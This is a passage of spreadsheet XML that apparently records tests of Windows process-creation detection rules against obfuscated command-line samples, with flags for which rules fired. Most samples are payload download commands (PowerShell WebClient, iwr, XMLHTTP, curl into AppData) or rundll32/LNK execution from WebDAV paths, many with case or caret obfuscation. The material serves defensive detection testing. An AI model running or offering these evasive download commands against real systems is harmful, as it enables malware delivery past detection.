    <row r="2327" ht="15.75" customHeight="1" s="42">
      <c r="A2327" s="44" t="n"/>
      <c r="B2327" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_web_request_cmd_and_cmdlets</t>
        </is>
      </c>
      <c r="C2327" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets</t>
        </is>
      </c>
      <c r="D2327" s="44" t="inlineStr">
        <is>
          <t>9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d</t>
        </is>
      </c>
      <c r="E2327" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMMaNd "$req = New-Object -ComObject Msxml2.XMLHTTP; $req.open('GET', 'http://example.com/payload', $false); $req.send(); $req.responseText"</t>
        </is>
      </c>
      <c r="F2327" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2327" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2327" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2327" s="44" t="n"/>
      <c r="J2327" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2327" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2328" ht="15.75" customHeight="1" s="42">
      <c r="A2328" s="44" t="n"/>
      <c r="B2328" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_web_request_cmd_and_cmdlets</t>
        </is>
      </c>
      <c r="C2328" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets</t>
        </is>
      </c>
      <c r="D2328" s="44" t="inlineStr">
        <is>
          <t>9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d</t>
        </is>
      </c>
      <c r="E2328" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMaND "$req = New-Object -ComObject Msxml2.XMLHTTP; $req.open('GET', 'http://example.com/payload', $false); $req.send(); $req.responseText"</t>
        </is>
      </c>
      <c r="F2328" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2328" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2328" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2328" s="44" t="n"/>
      <c r="J2328" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2328" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2329" ht="15.75" customHeight="1" s="42">
      <c r="A2329" s="44" t="n"/>
      <c r="B2329" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_web_request_cmd_and_cmdlets</t>
        </is>
      </c>
      <c r="C2329" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets</t>
        </is>
      </c>
      <c r="D2329" s="44" t="inlineStr">
        <is>
          <t>9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d</t>
        </is>
      </c>
      <c r="E2329" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$wc = New-Object ('Net.W' + 'ebClient'); $wc.DownloadString('http://example.com/payload')"</t>
        </is>
      </c>
      <c r="F2329" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2329" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2329" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2329" s="44" t="n"/>
      <c r="J2329" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2329" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2330" ht="15.75" customHeight="1" s="42">
      <c r="A2330" s="44" t="n"/>
      <c r="B2330" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_web_request_cmd_and_cmdlets</t>
        </is>
      </c>
      <c r="C2330" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets</t>
        </is>
      </c>
      <c r="D2330" s="44" t="inlineStr">
        <is>
          <t>9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d</t>
        </is>
      </c>
      <c r="E2330" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$wc = New-Object ('Net.W' + 'ebClient'); $wc.DownloadString('http://example.com/payload')"</t>
        </is>
      </c>
      <c r="F2330" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2330" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2330" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2330" s="44" t="n"/>
      <c r="J2330" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2330" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2331" ht="15.75" customHeight="1" s="42">
      <c r="A2331" s="44" t="n"/>
      <c r="B2331" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_web_request_cmd_and_cmdlets</t>
        </is>
      </c>
      <c r="C2331" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets</t>
        </is>
      </c>
      <c r="D2331" s="44" t="inlineStr">
        <is>
          <t>9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d</t>
        </is>
      </c>
      <c r="E2331" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMANd "$wc = New-Object ('Net.W' + 'ebClient'); $wc.DownloadString('http://example.com/payload')"</t>
        </is>
      </c>
      <c r="F2331" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2331" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2331" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2331" s="44" t="n"/>
      <c r="J2331" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2331" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2332" ht="15.75" customHeight="1" s="42">
      <c r="A2332" s="44" t="n"/>
      <c r="B2332" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_web_request_cmd_and_cmdlets</t>
        </is>
      </c>
      <c r="C2332" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets</t>
        </is>
      </c>
      <c r="D2332" s="44" t="inlineStr">
        <is>
          <t>9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d</t>
        </is>
      </c>
      <c r="E2332" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "iwr('http://example.com/payload')"</t>
        </is>
      </c>
      <c r="F2332" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2332" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2332" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2332" s="43" t="n"/>
      <c r="J2332" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2332" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2333" ht="15.75" customHeight="1" s="42">
      <c r="A2333" s="44" t="n"/>
      <c r="B2333" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_web_request_cmd_and_cmdlets</t>
        </is>
      </c>
      <c r="C2333" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets</t>
        </is>
      </c>
      <c r="D2333" s="44" t="inlineStr">
        <is>
          <t>9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d</t>
        </is>
      </c>
      <c r="E2333" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmmaNd "iwr('http://example.com/payload')"</t>
        </is>
      </c>
      <c r="F2333" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2333" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2333" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2333" s="44" t="n"/>
      <c r="J2333" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2333" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2334" ht="15.75" customHeight="1" s="42">
      <c r="A2334" s="44" t="n"/>
      <c r="B2334" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_web_request_cmd_and_cmdlets</t>
        </is>
      </c>
      <c r="C2334" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets</t>
        </is>
      </c>
      <c r="D2334" s="44" t="inlineStr">
        <is>
          <t>9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d</t>
        </is>
      </c>
      <c r="E2334" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "iwr('http://example.com/payload')"</t>
        </is>
      </c>
      <c r="F2334" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2334" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2334" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2334" s="44" t="n"/>
      <c r="J2334" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2334" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2335" ht="15.75" customHeight="1" s="42">
      <c r="A2335" s="44" t="n"/>
      <c r="B2335" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_web_request_cmd_and_cmdlets</t>
        </is>
      </c>
      <c r="C2335" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets</t>
        </is>
      </c>
      <c r="D2335" s="44" t="inlineStr">
        <is>
          <t>9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d</t>
        </is>
      </c>
      <c r="E2335" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMaNd "iwr('http://example.com/payload')"</t>
        </is>
      </c>
      <c r="F2335" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2335" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2335" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2335" s="43" t="n"/>
      <c r="J2335" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2335" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2336" ht="15.75" customHeight="1" s="42">
      <c r="A2336" s="44" t="n"/>
      <c r="B2336" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_web_request_cmd_and_cmdlets</t>
        </is>
      </c>
      <c r="C2336" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets</t>
        </is>
      </c>
      <c r="D2336" s="44" t="inlineStr">
        <is>
          <t>9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d</t>
        </is>
      </c>
      <c r="E2336" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -comMaND "iwr('http://example.com/payload')"</t>
        </is>
      </c>
      <c r="F2336" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2336" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2336" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2336" s="44" t="n"/>
      <c r="J2336" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2336" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2337" ht="15.75" customHeight="1" s="42">
      <c r="A2337" s="44" t="n"/>
      <c r="B2337" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_web_request_cmd_and_cmdlets</t>
        </is>
      </c>
      <c r="C2337" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets</t>
        </is>
      </c>
      <c r="D2337" s="44" t="inlineStr">
        <is>
          <t>9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d</t>
        </is>
      </c>
      <c r="E2337" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMmANd "iwr('http://example.com/payload')"</t>
        </is>
      </c>
      <c r="F2337" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2337" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2337" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2337" s="44" t="n"/>
      <c r="J2337" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2337" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2338" ht="15.75" customHeight="1" s="42">
      <c r="A2338" s="44" t="n"/>
      <c r="B2338" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_webdav_lnk_execution</t>
        </is>
      </c>
      <c r="C2338" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious WebDAV LNK Execution</t>
        </is>
      </c>
      <c r="D2338" s="44" t="inlineStr">
        <is>
          <t>1412aa78-a24c-4abd-83df-767dfb2c5bbe</t>
        </is>
      </c>
      <c r="E2338" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c start \\192.168.1.50@80\share\payload.lnk</t>
        </is>
      </c>
      <c r="F2338" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2338" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2338" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2338" s="44" t="n"/>
      <c r="J2338" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K2338" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2339" ht="15.75" customHeight="1" s="42">
      <c r="A2339" s="44" t="n"/>
      <c r="B2339" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_webdav_lnk_execution</t>
        </is>
      </c>
      <c r="C2339" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious WebDAV LNK Execution</t>
        </is>
      </c>
      <c r="D2339" s="44" t="inlineStr">
        <is>
          <t>1412aa78-a24c-4abd-83df-767dfb2c5bbe</t>
        </is>
      </c>
      <c r="E2339" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe \\192.168.1.10@80\DavWWWRoot\payload.dll,DllMain</t>
        </is>
      </c>
      <c r="F2339" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2339" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2339" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2339" s="44" t="inlineStr">
        <is>
          <t>Rundll32 UNC Path Execution (5cdb711b-5740-4fb2-ba88-f7945027afac); Rundll32 UNC Path Execution (5cdb711b-5740-4fb2-ba88-f7945027afac)</t>
        </is>
      </c>
      <c r="J2339" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2339" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2340" ht="15.75" customHeight="1" s="42">
      <c r="A2340" s="44" t="n"/>
      <c r="B2340" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_webdav_lnk_execution</t>
        </is>
      </c>
      <c r="C2340" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious WebDAV LNK Execution</t>
        </is>
      </c>
      <c r="D2340" s="44" t="inlineStr">
        <is>
          <t>1412aa78-a24c-4abd-83df-767dfb2c5bbe</t>
        </is>
      </c>
      <c r="E2340" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe \\192.168.1.50\DavWWWRoot\share\payload.dll,EntryPoint</t>
        </is>
      </c>
      <c r="F2340" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2340" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2340" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2340" s="43" t="inlineStr">
        <is>
          <t>Rundll32 UNC Path Execution (5cdb711b-5740-4fb2-ba88-f7945027afac); Rundll32 UNC Path Execution (5cdb711b-5740-4fb2-ba88-f7945027afac)</t>
        </is>
      </c>
      <c r="J2340" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2340" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2341" ht="15.75" customHeight="1" s="42">
      <c r="A2341" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B2341" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C2341" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D2341" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E2341" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "curl -o %A^ppData%\test.exe h^t^t^p://[example.com/test.exe]()"</t>
        </is>
      </c>
      <c r="F2341" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2341" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2341" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2341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341" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2341" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2342" ht="15.75" customHeight="1" s="42">
      <c r="A2342" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B2342" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C2342" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D2342" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E2342" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c curl -o %USERPROFILE%\AppData\Roaming\test.exe http://example.com/test.exe</t>
        </is>
      </c>
      <c r="F2342" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2342" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2342" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2342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42" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2342" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2343" ht="15.75" customHeight="1" s="42">
      <c r="A2343" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B2343" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C2343" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D2343" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E2343" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C curl -o %USERPROFILE%\AppData\Roaming\test.exe http://example.com/test.exe</t>
        </is>
      </c>
      <c r="F2343" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2343" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2343" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2343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43" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2343" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2344" ht="15.75" customHeight="1" s="42">
      <c r="A2344" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B2344" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C2344" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D2344" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E2344" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c curl -"o" %USERPROFILE%\AppData\Roaming\test.exe http://example.com/test.exe</t>
        </is>
      </c>
      <c r="F2344" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2344" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2344" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2344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44" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2344" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2345" ht="15.75" customHeight="1" s="42">
      <c r="A2345" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B2345" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C2345" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D2345" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E2345" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C curl -O %USERPROFILE%\AppData\Roaming\test.exe http://example.com/test.exe</t>
        </is>
      </c>
      <c r="F2345" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2345" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2345" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2345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45" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2345" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2346" ht="15.75" customHeight="1" s="42">
      <c r="A2346" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B2346" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C2346" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D2346" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E2346" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" curl -o %USERPROFILE%\AppData\Roaming\test.exe http://example.com/test.exe</t>
        </is>
      </c>
      <c r="F2346" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2346" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2346" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2346" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J2346" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2346" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2347" ht="15.75" customHeight="1" s="42">
      <c r="A2347" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B2347" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C2347" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D2347" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E2347" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" curl -o %USERPROFILE%\AppData\Roaming\test.exe http://example.com/test.exe</t>
        </is>
      </c>
      <c r="F2347" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2347" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2347" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2347" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J2347" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2347" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2348" ht="15.75" customHeight="1" s="42">
      <c r="A2348" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B2348" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C2348" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D2348" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E2348" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c curl /"o" %USERPROFILE%\AppData\Roaming\test.exe http://example.com/test.exe</t>
        </is>
      </c>
      <c r="F2348" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2348" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2348" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2348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48" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2348" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2349" ht="15.75" customHeight="1" s="42">
      <c r="A2349" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B2349" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C2349" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D2349" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E2349" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WebRequest -Uri 'http://example.com/test.exe' -OutFile $env:APPDATA\test.exe"</t>
        </is>
      </c>
      <c r="F2349" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2349" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2349" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2349" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J2349" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2349" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2350" ht="15.75" customHeight="1" s="42">
      <c r="A2350" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B2350" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C2350" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D2350" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E2350" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-WebRequest -Uri 'http://example.com/test.exe' -OutFile $env:APPDATA\test.exe"</t>
        </is>
      </c>
      <c r="F2350" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2350" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2350" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2350" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J2350" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2350" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2351" ht="15.75" customHeight="1" s="42">
      <c r="A2351" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B2351" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C2351" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D2351" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E2351" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmmANd "Invoke-WebRequest -Uri 'http://example.com/test.exe' -OutFile $env:APPDATA\test.exe"</t>
        </is>
      </c>
      <c r="F2351" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2351" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2351" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2351" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J2351" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2351" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2352" ht="15.75" customHeight="1" s="42">
      <c r="A2352" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B2352" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C2352" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D2352" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E2352" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMAnD "Invoke-WebRequest -Uri 'http://example.com/test.exe' -OutFile $env:APPDATA\test.exe"</t>
        </is>
      </c>
      <c r="F2352" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2352" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2352" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2352" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J2352" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2352" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2353" ht="15.75" customHeight="1" s="42">
      <c r="A2353" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
